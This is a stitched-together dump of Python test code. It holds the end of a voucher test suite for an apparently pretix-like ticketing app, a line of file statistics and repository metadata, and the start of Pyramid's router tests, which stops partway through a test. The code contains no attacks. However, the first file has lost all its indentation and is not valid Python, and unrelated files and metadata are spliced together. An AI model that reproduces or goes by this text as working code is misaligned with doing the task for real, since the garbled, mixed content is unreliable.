v = self.event.vouchers.create(item=self.ticket, block_quota=True)
self._change_voucher(v, {
'itemvar': '%d' % ticket2.pk,
})
def test_change_item_of_blocking_voucher_quota_full(self):
self.quota_shirts.size = 0
self.quota_shirts.save()
hoodie = Item.objects.create(event=self.event, name='Hoodie', default_price=23)
self.quota_shirts.items.add(hoodie)
v = self.event.vouchers.create(item=self.ticket, block_quota=True)
self._change_voucher(v, {
'itemvar': '%d' % hoodie.pk,
}, expected_failure=True)
def test_change_variation_of_blocking_voucher_quota_free(self):
self.quota_shirts.variations.remove(self.shirt_blue)
self.quota_tickets.variations.add(self.shirt_blue)
v = self.event.vouchers.create(item=self.shirt, variation=self.shirt_red, block_quota=True)
self._change_voucher(v, {
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_blue.pk),
})
def test_change_variation_of_blocking_voucher_quota_full(self):
self.quota_shirts.variations.remove(self.shirt_blue)
self.quota_tickets.variations.add(self.shirt_blue)
self.quota_tickets.size = 0
self.quota_tickets.save()
v = self.event.vouchers.create(item=self.shirt, variation=self.shirt_red, block_quota=True)
self._change_voucher(v, {
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_blue.pk),
}, expected_failure=True)
def test_change_quota_of_blocking_voucher_quota_free(self):
v = self.event.vouchers.create(quota=self.quota_tickets, block_quota=True)
self._change_voucher(v, {
'itemvar': 'q-%d' % self.quota_shirts.pk,
})
def test_change_quota_of_blocking_voucher_quota_full(self):
self.quota_shirts.size = 0
self.quota_shirts.save()
v = self.event.vouchers.create(quota=self.quota_tickets, block_quota=True)
self._change_voucher(v, {
'itemvar': 'q-%d' % self.quota_shirts.pk,
}, expected_failure=True)
def test_change_item_of_blocking_voucher_without_quota_change(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
ticket2 = Item.objects.create(event=self.event, name='Standard Ticket', default_price=23)
self.quota_tickets.items.add(ticket2)
v = self.event.vouchers.create(item=self.ticket, block_quota=True)
self._change_voucher(v, {
'itemvar': '%d' % ticket2.pk,
})
def test_change_variation_of_blocking_voucher_without_quota_change(self):
self.quota_shirts.size = 0
self.quota_shirts.save()
v = self.event.vouchers.create(item=self.shirt, variation=self.shirt_red, block_quota=True)
self._change_voucher(v, {
'itemvar': '%d-%d' % (self.shirt.pk, self.shirt_blue.pk),
})
def test_create_duplicate_code(self):
v = self.event.vouchers.create(quota=self.quota_tickets)
self._create_voucher({
'code': v.code,
}, expected_failure=True)
def test_change_code_to_duplicate(self):
v1 = self.event.vouchers.create(quota=self.quota_tickets)
v2 = self.event.vouchers.create(quota=self.quota_tickets)
self._change_voucher(v1, {
'code': v2.code
}, expected_failure=True)
def test_create_bulk(self):
self._create_bulk_vouchers({
'codes': 'ABCDE\nDEFGH',
'itemvar': '%d' % self.shirt.pk,
})
def test_create_bulk_many(self):
self._create_bulk_vouchers({
'codes': 'ABCDE\nDEFGH\nIJKLM\nNOPQR\nSTUVW\nXYZ',
'itemvar': '%d' % self.ticket.pk,
})
def test_create_blocking_bulk_quota_full(self):
self.quota_tickets.size = 0
self.quota_tickets.save()
self._create_bulk_vouchers({
'codes': 'ABCDE\nDEFGH',
'itemvar': '%d' % self.ticket.pk,
'block_quota': 'on'
}, expected_failure=True)
def test_create_blocking_bulk_quota_free(self):
self.quota_tickets.size = 5
self.quota_tickets.save()
self._create_bulk_vouchers({
'codes': 'ABCDE\nDEFGH',
'itemvar': '%d' % self.ticket.pk,
'block_quota': 'on'
})
def test_create_blocking_bulk_quota_partial(self):
self.quota_tickets.size = 1
self.quota_tickets.save()
self._create_bulk_vouchers({
'codes': 'ABCDE\nDEFGH',
'itemvar': '%d' % self.ticket.pk,
'block_quota': 'on'
}, expected_failure=True)
def test_create_bulk_with_duplicate_code(self):
v = self.event.vouchers.create(quota=self.quota_tickets)
self._create_bulk_vouchers({
'codes': 'ABCDE\n%s' % v.code,
'itemvar': '%d' % self.shirt.pk,
}, expected_failure=True)
def test_delete_voucher(self):
v = self.event.vouchers.create(quota=self.quota_tickets)
doc = self.get_doc('/control/event/%s/%s/vouchers/%s/delete' % (self.orga.slug, self.event.slug, v.pk),
follow=True)
assert not doc.select(".alert-danger")
doc = self.post_doc('/control/event/%s/%s/vouchers/%s/delete' % (self.orga.slug, self.event.slug, v.pk),
{}, follow=True)
assert doc.select(".alert-success")
assert not self.event.vouchers.filter(pk=v.id).exists()
def test_delete_voucher_redeemed(self):
v = self.event.vouchers.create(quota=self.quota_tickets, redeemed=1)
doc = self.get_doc('/control/event/%s/%s/vouchers/%s/delete' % (self.orga.slug, self.event.slug, v.pk),
follow=True)
assert doc.select(".alert-danger")
doc = self.post_doc('/control/event/%s/%s/vouchers/%s/delete' % (self.orga.slug, self.event.slug, v.pk),
{}, follow=True)
assert doc.select(".alert-danger")
def test_subevent_optional(self):
self.event.has_subevents = True
self.event.save()
self._create_voucher({
'itemvar': '%d' % self.ticket.pk,
})
def test_subevent_non_blocking_quota_no_date(self):
self.event.has_subevents = True
self.event.save()
se1 = self.event.subevents.create(name="Foo", date_from=now())
self.event.subevents.create(name="Bar", date_from=now())
self.quota_tickets.subevent = se1
self.quota_tickets.save()
self._create_voucher({
'itemvar': 'q-%d' % self.quota_tickets.pk,
})
def test_subevent_required_for_blocking(self):
self.event.has_subevents = True
self.event.save()
self._create_voucher({
'itemvar': '%d' % self.ticket.pk,
'block_quota': 'on'
}, expected_failure=True)
def test_subevent_blocking_quota_free(self):
self.event.has_subevents = True
self.event.save()
se1 = self.event.subevents.create(name="Foo", date_from=now())
se2 = self.event.subevents.create(name="Bar", date_from=now())
self.quota_tickets.subevent = se1
self.quota_tickets.save()
q2 = Quota.objects.create(event=self.event, name='Tickets', size=0, subevent=se2)
q2.items.add(self.ticket)
self._create_voucher({
'itemvar': '%d' % self.ticket.pk,
'block_quota': 'on',
'subevent': se1.pk
})
def test_subevent_blocking_quota_full(self):
self.event.has_subevents = True
self.event.save()
se1 = self.event.subevents.create(name="Foo", date_from=now())
se2 = self.event.subevents.create(name="Bar", date_from=now())
self.quota_tickets.subevent = se1
self.quota_tickets.size = 0
self.quota_tickets.save()
q2 = Quota.objects.create(event=self.event, name='Tickets', size=5, subevent=se2)
q2.items.add(self.ticket)
self._create_voucher({
'itemvar': '%d' % self.ticket.pk,
'block_quota': 'on',
'subevent': se1.pk
}, expected_failure=True)
| 43.163462 | 117 | 0.626108 | 2,936 | 22,445 | 4.58549 | 0.074932 | 0.060833 | 0.054668 | 0.047835 | 0.862438 | 0.837481 | 0.809849 | 0.762163 | 0.72235 | 0.684469 | 0 | 0.00662 | 0.232791 | 22,445 | 519 | 118 | 43.246628 | 0.775203 | 0 | 0 | 0.672566 | 0 | 0 | 0.112943 | 0.051281 | 0 | 0 | 0 | 0 | 0.119469 | 1 | 0.121681 | false | 0.004425 | 0.011062 | 0 | 0.134956 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6097018f0fe036e061cb3a84eab2bd39b25444d5 | 62,384 | py | Python | ENV/lib/python3.6/site-packages/pyramid/tests/test_router.py | captain-c00keys/pyramid-stocks | 0acf3363a6a7ee61cd41b855f43c9d6f9582ae6a | [
"MIT"
] | null | null | null | ENV/lib/python3.6/site-packages/pyramid/tests/test_router.py | captain-c00keys/pyramid-stocks | 0acf3363a6a7ee61cd41b855f43c9d6f9582ae6a | [
"MIT"
] | null | null | null | ENV/lib/python3.6/site-packages/pyramid/tests/test_router.py | captain-c00keys/pyramid-stocks | 0acf3363a6a7ee61cd41b855f43c9d6f9582ae6a | [
"MIT"
] | null | null | null | import unittest
from pyramid import testing
class TestRouter(unittest.TestCase):
def setUp(self):
self.config = testing.setUp()
self.registry = self.config.registry
def tearDown(self):
testing.tearDown()
def _registerRouteRequest(self, name):
from pyramid.interfaces import IRouteRequest
from pyramid.request import route_request_iface
iface = route_request_iface(name)
self.registry.registerUtility(iface, IRouteRequest, name=name)
return iface
def _connectRoute(self, name, path, factory=None):
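# Register a route on the shared RoutesMapper utility, creating and registering
# the mapper on first use.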
from pyramid.interfaces import IRoutesMapper
from pyramid.urldispatch import RoutesMapper
mapper = self.registry.queryUtility(IRoutesMapper)
if mapper is None:
mapper = RoutesMapper()
self.registry.registerUtility(mapper, IRoutesMapper)
return mapper.connect(name, path, factory)
def _registerLogger(self):
from pyramid.interfaces import IDebugLogger
logger = DummyLogger()
self.registry.registerUtility(logger, IDebugLogger)
return logger
def _registerSettings(self, **kw):
settings = {'debug_authorization':False,
'debug_notfound':False,
'debug_routematch':False}
settings.update(kw)
self.registry.settings = settings
def _registerTraverserFactory(self, context, view_name='', subpath=None,
traversed=None, virtual_root=None,
virtual_root_path=None, raise_error=None,
**kw):
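# Register a dummy ITraverser adapter whose __call__ ignores real traversal and
# returns the canned values supplied to this helper.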
from pyramid.interfaces import ITraverser
if virtual_root is None:
virtual_root = context
if subpath is None:
subpath = []
if traversed is None:
traversed = []
if virtual_root_path is None:
virtual_root_path = []
class DummyTraverserFactory:
def __init__(self, root):
self.root = root
def __call__(self, request):
if raise_error:
raise raise_error
values = {'root':self.root,
'context':context,
'view_name':view_name,
'subpath':subpath,
'traversed':traversed,
'virtual_root':virtual_root,
'virtual_root_path':virtual_root_path}
kw.update(values)
return kw
self.registry.registerAdapter(DummyTraverserFactory, (None,),
ITraverser, name='')
def _registerView(self, app, name, classifier, req_iface, ctx_iface):
from pyramid.interfaces import IView
self.registry.registerAdapter(
app, (classifier, req_iface, ctx_iface), IView, name)
def _registerEventListener(self, iface):
L = []
def listener(event):
L.append(event)
self.registry.registerHandler(listener, (iface,))
return L
def _registerRootFactory(self, val):
rootfactory = DummyRootFactory(val)
from pyramid.interfaces import IRootFactory
self.registry.registerUtility(rootfactory, IRootFactory)
return rootfactory
def _getTargetClass(self):
from pyramid.router import Router
return Router
def _makeOne(self):
klass = self._getTargetClass()
return klass(self.registry)
def _makeEnviron(self, **extras):
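# Build a minimal WSGI environ for a GET request to "/" and overlay any
# test-specific keys passed in `extras`.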
environ = {
'wsgi.url_scheme':'http',
'SERVER_NAME':'localhost',
'SERVER_PORT':'8080',
'REQUEST_METHOD':'GET',
'PATH_INFO':'/',
}
environ.update(extras)
return environ
def test_ctor_registry_has_no_settings(self):
self.registry.settings = None
router = self._makeOne()
self.assertEqual(router.debug_notfound, False)
self.assertEqual(router.debug_routematch, False)
self.assertFalse('debug_notfound' in router.__dict__)
self.assertFalse('debug_routematch' in router.__dict__)
def test_root_policy(self):
context = DummyContext()
self._registerTraverserFactory(context)
rootfactory = self._registerRootFactory('abc')
router = self._makeOne()
self.assertEqual(router.root_policy, rootfactory)
def test_request_factory(self):
from pyramid.interfaces import IRequestFactory
class DummyRequestFactory(object):
pass
self.registry.registerUtility(DummyRequestFactory, IRequestFactory)
router = self._makeOne()
self.assertEqual(router.request_factory, DummyRequestFactory)
def test_tween_factories(self):
from pyramid.interfaces import ITweens
from pyramid.config.tweens import Tweens
from pyramid.response import Response
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IResponse
tweens = Tweens()
self.registry.registerUtility(tweens, ITweens)
L = []
def tween_factory1(handler, registry):
L.append((handler, registry))
def wrapper(request):
request.environ['handled'].append('one')
return handler(request)
wrapper.name = 'one'
wrapper.child = handler
return wrapper
def tween_factory2(handler, registry):
L.append((handler, registry))
def wrapper(request):
request.environ['handled'] = ['two']
return handler(request)
wrapper.name = 'two'
wrapper.child = handler
return wrapper
tweens.add_implicit('one', tween_factory1)
tweens.add_implicit('two', tween_factory2)
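# The most recently added implicit tween becomes the outermost wrapper, so the
# request passes through 'two' first, then 'one', then the default handler.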
router = self._makeOne()
self.assertEqual(router.handle_request.name, 'two')
self.assertEqual(router.handle_request.child.name, 'one')
self.assertEqual(router.handle_request.child.child.__name__,
'handle_request')
context = DummyContext()
self._registerTraverserFactory(context)
environ = self._makeEnviron()
view = DummyView('abc')
self._registerView(self.config.derive_view(view), '',
IViewClassifier, None, None)
start_response = DummyStartResponse()
def make_response(s):
return Response(s)
router.registry.registerAdapter(make_response, (str,), IResponse)
app_iter = router(environ, start_response)
self.assertEqual(app_iter, [b'abc'])
self.assertEqual(start_response.status, '200 OK')
self.assertEqual(environ['handled'], ['two', 'one'])
def test_call_traverser_default(self):
from pyramid.httpexceptions import HTTPNotFound
environ = self._makeEnviron()
logger = self._registerLogger()
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPNotFound, router, environ, start_response)
self.assertTrue('/' in why.args[0], why)
self.assertFalse('debug_notfound' in why.args[0])
self.assertEqual(len(logger.messages), 0)
def test_traverser_raises_notfound_class(self):
from pyramid.httpexceptions import HTTPNotFound
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context, raise_error=HTTPNotFound)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(HTTPNotFound, router, environ, start_response)
def test_traverser_raises_notfound_instance(self):
from pyramid.httpexceptions import HTTPNotFound
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context, raise_error=HTTPNotFound('foo'))
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPNotFound, router, environ, start_response)
self.assertTrue('foo' in why.args[0], why)
def test_traverser_raises_forbidden_class(self):
from pyramid.httpexceptions import HTTPForbidden
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context, raise_error=HTTPForbidden)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(HTTPForbidden, router, environ, start_response)
def test_traverser_raises_forbidden_instance(self):
from pyramid.httpexceptions import HTTPForbidden
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context,
raise_error=HTTPForbidden('foo'))
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPForbidden, router, environ, start_response)
self.assertTrue('foo' in why.args[0], why)
def test_call_no_view_registered_no_isettings(self):
from pyramid.httpexceptions import HTTPNotFound
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context)
logger = self._registerLogger()
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPNotFound, router, environ, start_response)
self.assertTrue('/' in why.args[0], why)
self.assertFalse('debug_notfound' in why.args[0])
self.assertEqual(len(logger.messages), 0)
def test_call_no_view_registered_debug_notfound_false(self):
from pyramid.httpexceptions import HTTPNotFound
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context)
logger = self._registerLogger()
self._registerSettings(debug_notfound=False)
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPNotFound, router, environ, start_response)
self.assertTrue('/' in why.args[0], why)
self.assertFalse('debug_notfound' in why.args[0])
self.assertEqual(len(logger.messages), 0)
def test_call_no_view_registered_debug_notfound_true(self):
from pyramid.httpexceptions import HTTPNotFound
environ = self._makeEnviron()
context = DummyContext()
self._registerTraverserFactory(context)
self._registerSettings(debug_notfound=True)
logger = self._registerLogger()
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPNotFound, router, environ, start_response)
self.assertTrue(
"debug_notfound of url http://localhost:8080/; " in why.args[0])
self.assertTrue("view_name: '', subpath: []" in why.args[0])
self.assertTrue('http://localhost:8080' in why.args[0], why)
self.assertEqual(len(logger.messages), 1)
message = logger.messages[0]
self.assertTrue('of url http://localhost:8080' in message)
self.assertTrue("path_info: " in message)
self.assertTrue('DummyContext' in message)
self.assertTrue("view_name: ''" in message)
self.assertTrue("subpath: []" in message)
def test_call_view_returns_non_iresponse(self):
from pyramid.interfaces import IViewClassifier
context = DummyContext()
self._registerTraverserFactory(context)
environ = self._makeEnviron()
view = DummyView('abc')
self._registerView(self.config.derive_view(view), '', IViewClassifier,
None, None)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(ValueError, router, environ, start_response)
def test_call_view_returns_adapted_response(self):
from pyramid.response import Response
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IResponse
context = DummyContext()
self._registerTraverserFactory(context)
environ = self._makeEnviron()
view = DummyView('abc')
self._registerView(self.config.derive_view(view), '',
IViewClassifier, None, None)
router = self._makeOne()
start_response = DummyStartResponse()
def make_response(s):
return Response(s)
router.registry.registerAdapter(make_response, (str,), IResponse)
app_iter = router(environ, start_response)
self.assertEqual(app_iter, [b'abc'])
self.assertEqual(start_response.status, '200 OK')
def test_call_with_request_extensions(self):
from pyramid.interfaces import IViewClassifier
from pyramid.interfaces import IRequestExtensions
from pyramid.interfaces import IRequest
from pyramid.request import Request
from pyramid.util import InstancePropertyHelper
context = DummyContext()
self._registerTraverserFactory(context)
class Extensions(object):
def __init__(self):
self.methods = {}
self.descriptors = {}
extensions = Extensions()
ext_method = lambda r: 'bar'
name, fn = InstancePropertyHelper.make_property(ext_method, name='foo')
extensions.descriptors[name] = fn
request = Request.blank('/')
request.request_iface = IRequest
request.registry = self.registry
def request_factory(environ):
return request
self.registry.registerUtility(extensions, IRequestExtensions)
environ = self._makeEnviron()
response = DummyResponse()
response.app_iter = ['Hello world']
view = DummyView(response)
self._registerView(self.config.derive_view(view), '',
IViewClassifier, None, None)
router = self._makeOne()
router.request_factory = request_factory
start_response = DummyStartResponse()
router(environ, start_response)
self.assertEqual(view.request.foo, 'bar')
def test_call_view_registered_nonspecific_default_path(self):
from pyramid.interfaces import IViewClassifier
context = DummyContext()
self._registerTraverserFactory(context)
response = DummyResponse()
response.app_iter = ['Hello world']
view = DummyView(response)
environ = self._makeEnviron()
self._registerView(self.config.derive_view(view), '',
IViewClassifier, None, None)
self._registerRootFactory(context)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ['Hello world'])
self.assertEqual(start_response.headers, ())
self.assertEqual(start_response.status, '200 OK')
request = view.request
self.assertEqual(request.view_name, '')
self.assertEqual(request.subpath, [])
self.assertEqual(request.context, context)
self.assertEqual(request.root, context)
def test_call_view_registered_nonspecific_nondefault_path_and_subpath(self):
from pyramid.interfaces import IViewClassifier
context = DummyContext()
self._registerTraverserFactory(context, view_name='foo',
subpath=['bar'],
traversed=['context'])
self._registerRootFactory(context)
response = DummyResponse()
response.app_iter = ['Hello world']
view = DummyView(response)
environ = self._makeEnviron()
self._registerView(view, 'foo', IViewClassifier, None, None)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ['Hello world'])
self.assertEqual(start_response.headers, ())
self.assertEqual(start_response.status, '200 OK')
request = view.request
self.assertEqual(request.view_name, 'foo')
self.assertEqual(request.subpath, ['bar'])
self.assertEqual(request.context, context)
self.assertEqual(request.root, context)
def test_call_view_registered_specific_success(self):
from zope.interface import Interface
from zope.interface import directlyProvides
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context)
self._registerRootFactory(context)
response = DummyResponse()
response.app_iter = ['Hello world']
view = DummyView(response)
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ['Hello world'])
self.assertEqual(start_response.headers, ())
self.assertEqual(start_response.status, '200 OK')
request = view.request
self.assertEqual(request.view_name, '')
self.assertEqual(request.subpath, [])
self.assertEqual(request.context, context)
self.assertEqual(request.root, context)
def test_call_view_registered_specific_fail(self):
from zope.interface import Interface
from zope.interface import directlyProvides
from pyramid.httpexceptions import HTTPNotFound
from pyramid.interfaces import IViewClassifier
class IContext(Interface):
pass
class INotContext(Interface):
pass
from pyramid.interfaces import IRequest
context = DummyContext()
directlyProvides(context, INotContext)
self._registerTraverserFactory(context, subpath=[''])
response = DummyResponse()
view = DummyView(response)
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(HTTPNotFound, router, environ, start_response)
def test_call_view_raises_forbidden(self):
from zope.interface import Interface
from zope.interface import directlyProvides
from pyramid.httpexceptions import HTTPForbidden
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context, subpath=[''])
response = DummyResponse()
view = DummyView(response,
raise_exception=HTTPForbidden("unauthorized"))
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPForbidden, router, environ, start_response)
self.assertEqual(why.args[0], 'unauthorized')
def test_call_view_raises_notfound(self):
from zope.interface import Interface
from zope.interface import directlyProvides
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
from pyramid.httpexceptions import HTTPNotFound
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context, subpath=[''])
response = DummyResponse()
view = DummyView(response, raise_exception=HTTPNotFound("notfound"))
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPNotFound, router, environ, start_response)
self.assertEqual(why.args[0], 'notfound')
def test_call_view_raises_response_cleared(self):
from zope.interface import Interface
from zope.interface import directlyProvides
from pyramid.interfaces import IExceptionViewClassifier
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context, subpath=[''])
def view(context, request):
request.response.a = 1
raise KeyError
def exc_view(context, request):
self.assertFalse(hasattr(request.response, 'a'))
request.response.body = b'OK'
return request.response
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
self._registerView(exc_view, '', IExceptionViewClassifier,
IRequest, KeyError)
router = self._makeOne()
start_response = DummyStartResponse()
itera = router(environ, start_response)
self.assertEqual(itera, [b'OK'])
def test_call_request_has_response_callbacks(self):
from zope.interface import Interface
from zope.interface import directlyProvides
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context, subpath=[''])
response = DummyResponse('200 OK')
def view(context, request):
def callback(request, response):
response.called_back = True
request.add_response_callback(callback)
return response
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
router = self._makeOne()
start_response = DummyStartResponse()
router(environ, start_response)
self.assertEqual(response.called_back, True)
def test_call_request_has_finished_callbacks_when_view_succeeds(self):
from zope.interface import Interface
from zope.interface import directlyProvides
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context, subpath=[''])
response = DummyResponse('200 OK')
def view(context, request):
def callback(request):
request.environ['called_back'] = True
request.add_finished_callback(callback)
return response
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
router = self._makeOne()
start_response = DummyStartResponse()
router(environ, start_response)
self.assertEqual(environ['called_back'], True)
def test_call_request_has_finished_callbacks_when_view_raises(self):
from zope.interface import Interface
from zope.interface import directlyProvides
class IContext(Interface):
pass
from pyramid.interfaces import IRequest
from pyramid.interfaces import IViewClassifier
context = DummyContext()
directlyProvides(context, IContext)
self._registerTraverserFactory(context, subpath=[''])
def view(context, request):
def callback(request):
request.environ['called_back'] = True
request.add_finished_callback(callback)
raise NotImplementedError
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, IRequest, IContext)
router = self._makeOne()
start_response = DummyStartResponse()
exc_raised(NotImplementedError, router, environ, start_response)
self.assertEqual(environ['called_back'], True)
def test_call_request_factory_raises(self):
# make sure the finally clause doesn't barf when a request cannot be created
environ = self._makeEnviron()
router = self._makeOne()
def dummy_request_factory(environ):
raise NotImplementedError
router.request_factory = dummy_request_factory
start_response = DummyStartResponse()
exc_raised(NotImplementedError, router, environ, start_response)
def test_call_eventsends(self):
from pyramid.interfaces import INewRequest
from pyramid.interfaces import INewResponse
from pyramid.interfaces import IBeforeTraversal
from pyramid.interfaces import IContextFound
from pyramid.interfaces import IViewClassifier
context = DummyContext()
self._registerTraverserFactory(context)
response = DummyResponse()
response.app_iter = ['Hello world']
view = DummyView(response)
environ = self._makeEnviron()
self._registerView(view, '', IViewClassifier, None, None)
request_events = self._registerEventListener(INewRequest)
beforetraversal_events = self._registerEventListener(IBeforeTraversal)
context_found_events = self._registerEventListener(IContextFound)
response_events = self._registerEventListener(INewResponse)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(len(request_events), 1)
self.assertEqual(request_events[0].request.environ, environ)
self.assertEqual(len(beforetraversal_events), 1)
self.assertEqual(beforetraversal_events[0].request.environ, environ)
self.assertEqual(len(context_found_events), 1)
self.assertEqual(context_found_events[0].request.environ, environ)
self.assertEqual(context_found_events[0].request.context, context)
self.assertEqual(len(response_events), 1)
self.assertEqual(response_events[0].response, response)
self.assertEqual(response_events[0].request.context, context)
self.assertEqual(result, response.app_iter)
def test_call_newrequest_evllist_exc_can_be_caught_by_exceptionview(self):
from pyramid.interfaces import INewRequest
from pyramid.interfaces import IExceptionViewClassifier
from pyramid.interfaces import IRequest
context = DummyContext()
self._registerTraverserFactory(context)
environ = self._makeEnviron()
def listener(event):
raise KeyError
self.registry.registerHandler(listener, (INewRequest,))
exception_response = DummyResponse()
exception_response.app_iter = ["Hello, world"]
exception_view = DummyView(exception_response)
environ = self._makeEnviron()
self._registerView(exception_view, '', IExceptionViewClassifier,
IRequest, KeyError)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, exception_response.app_iter)
def test_call_route_matches_and_has_factory(self):
from pyramid.interfaces import IViewClassifier
logger = self._registerLogger()
self._registerSettings(debug_routematch=True)
self._registerRouteRequest('foo')
root = object()
def factory(request):
return root
route = self._connectRoute('foo', 'archives/:action/:article', factory)
route.predicates = [DummyPredicate()]
context = DummyContext()
self._registerTraverserFactory(context)
response = DummyResponse()
response.app_iter = ['Hello world']
view = DummyView(response)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
self._registerView(view, '', IViewClassifier, None, None)
self._registerRootFactory(context)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ['Hello world'])
self.assertEqual(start_response.headers, ())
self.assertEqual(start_response.status, '200 OK')
request = view.request
self.assertEqual(request.view_name, '')
self.assertEqual(request.subpath, [])
self.assertEqual(request.context, context)
self.assertEqual(request.root, root)
matchdict = {'action':'action1', 'article':'article1'}
self.assertEqual(request.matchdict, matchdict)
self.assertEqual(request.matched_route.name, 'foo')
self.assertEqual(len(logger.messages), 1)
self.assertTrue(
logger.messages[0].startswith(
"route matched for url http://localhost:8080"
"/archives/action1/article1; "
"route_name: 'foo', "
"path_info: ")
)
self.assertTrue(
"predicates: 'predicate'" in logger.messages[0]
)
def test_call_route_match_miss_debug_routematch(self):
from pyramid.httpexceptions import HTTPNotFound
logger = self._registerLogger()
self._registerSettings(debug_routematch=True)
self._registerRouteRequest('foo')
self._connectRoute('foo', 'archives/:action/:article')
context = DummyContext()
self._registerTraverserFactory(context)
environ = self._makeEnviron(PATH_INFO='/wontmatch')
self._registerRootFactory(context)
router = self._makeOne()
start_response = DummyStartResponse()
self.assertRaises(HTTPNotFound, router, environ, start_response)
self.assertEqual(len(logger.messages), 1)
self.assertEqual(
logger.messages[0],
'no route matched for url http://localhost:8080/wontmatch')
def test_call_route_matches_doesnt_overwrite_subscriber_iface(self):
from pyramid.interfaces import INewRequest
from pyramid.interfaces import IViewClassifier
from zope.interface import alsoProvides
from zope.interface import Interface
self._registerRouteRequest('foo')
class IFoo(Interface):
pass
def listener(event):
alsoProvides(event.request, IFoo)
self.registry.registerHandler(listener, (INewRequest,))
root = object()
def factory(request):
return root
self._connectRoute('foo', 'archives/:action/:article', factory)
context = DummyContext()
self._registerTraverserFactory(context)
response = DummyResponse()
response.app_iter = ['Hello world']
view = DummyView(response)
environ = self._makeEnviron(PATH_INFO='/archives/action1/article1')
self._registerView(view, '', IViewClassifier, None, None)
self._registerRootFactory(context)
router = self._makeOne()
start_response = DummyStartResponse()
result = router(environ, start_response)
self.assertEqual(result, ['Hello world'])
self.assertEqual(start_response.headers, ())
self.assertEqual(start_response.status, '200 OK')
request = view.request
self.assertEqual(request.view_name, '')
self.assertEqual(request.subpath, [])
self.assertEqual(request.context, context)
self.assertEqual(request.root, root)
matchdict = {'action':'action1', 'article':'article1'}
self.assertEqual(request.matchdict, matchdict)
self.assertEqual(request.matched_route.name, 'foo')
self.assertTrue(IFoo.providedBy(request))
def test_root_factory_raises_notfound(self):
from pyramid.interfaces import IRootFactory
from pyramid.httpexceptions import HTTPNotFound
from zope.interface import Interface
from zope.interface import directlyProvides
def rootfactory(request):
raise HTTPNotFound('from root factory')
self.registry.registerUtility(rootfactory, IRootFactory)
class IContext(Interface):
pass
context = DummyContext()
directlyProvides(context, IContext)
environ = self._makeEnviron()
router = self._makeOne()
start_response = DummyStartResponse()
why = exc_raised(HTTPNotFound, router, environ, start_response)
self.assertTrue('from root factory' in why.args[0])
def test_root_factory_raises_forbidden(self):
from pyramid.interfaces import IRootFactory
from pyramid.httpexceptions import HTTPForbidden
from zope.interface import Interface
from zope.interface import directlyProvides
def rootfactory(request):
raise HTTPForbidden('from root factory')
self.registry.registerUtility(rootfactory, IRootFactory)
class IContext(Interface):
pass
context = DummyContext()
directlyProvides(context, IContext)
environ = self._makeEnviron()
router = self._makeOne()
